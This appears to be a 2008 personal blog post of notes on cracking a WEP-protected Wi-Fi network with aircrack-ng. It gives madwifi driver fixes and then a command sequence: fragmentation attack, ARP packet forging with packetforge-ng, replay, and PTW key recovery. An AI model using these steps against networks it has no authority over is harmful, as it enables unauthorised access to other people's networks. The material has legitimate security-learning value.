Thursday, November 6, 2008

Cracking WEP protected wireless network

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
Installation notes on OpenSUSE 10.3:
#Wireless card Atheros AR2413 chipset
#install c/c++ and source pkg
#compile and install madwifi 0.9.4
During install, if ath0 cannot be stopped and you get these errors:
FATAL: Module wlan_wep is in use.
FATAL: Module wlan_scan_sta is in use.
FATAL: Module wlan is in use
Do the following:
sudo rmmod ath_pci
sudo rmmod ath_rate_sample
sudo rmmod wlan_scan_sta
sudo rmmod wlan_wep
sudo rmmod wlan
#madwifi driver patch r3386 does not work, use r2277
# if no client is associated with the target AP, the type 1 attack will not work (you get 0 ARP requests); use the fragmentation attack instead:
After the fake auth step, do:
aireplay-ng -5 -b -h
This creates the xor file for the next step.
packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y -w arp-request
This creates an ARP request to be used with aireplay:
aireplay-ng -2 -r arp-request
#use kismet to get the client list (c key)
#use aircrack PTW to find key.
